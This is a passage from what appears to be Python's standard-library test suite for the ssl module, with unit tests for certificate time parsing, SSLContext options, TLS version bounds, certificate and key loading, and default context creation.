expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
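        # Purpose.SERVER_AUTH and Purpose.CLIENT_AUTH are _ASN1Object instances
        # for the serverAuth and clientAuth extended key usage OIDs.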
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
        # no special treatment for the special value
        # 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
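        # set_ciphers() accepts standard OpenSSL cipher strings and raises
        # SSLError for a nonsense cipher list.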
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
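        # hostname_checks_common_name is writable only when the build exposes
        # ssl.HAS_NEVER_CHECK_COMMON_NAME; otherwise assignment raises
        # AttributeError.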
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        # The OpenSSL default is MINIMUM_SUPPORTED; however, some vendors
        # such as Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        # The default security callback allows levels between 0 and 5;
        # OpenSSL defaults to 1, but some vendors override the default
        # value (e.g. Debian defaults to 2).
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
            # OpenSSL has a fixed limit on the password buffer
            # (PEM_BUFSIZE, typically 1 KiB), so pass a password
            # longer than that.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
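        # A freshly created context reports all-zero session statistics.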
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
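        # Only load_verify_locations() adds to the verification store;
        # load_cert_chain() leaves the x509/x509_ca/crl counters untouched.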
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
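        # load_default_certs() accepts no argument or a Purpose member and
        # rejects anything else with TypeError.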
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
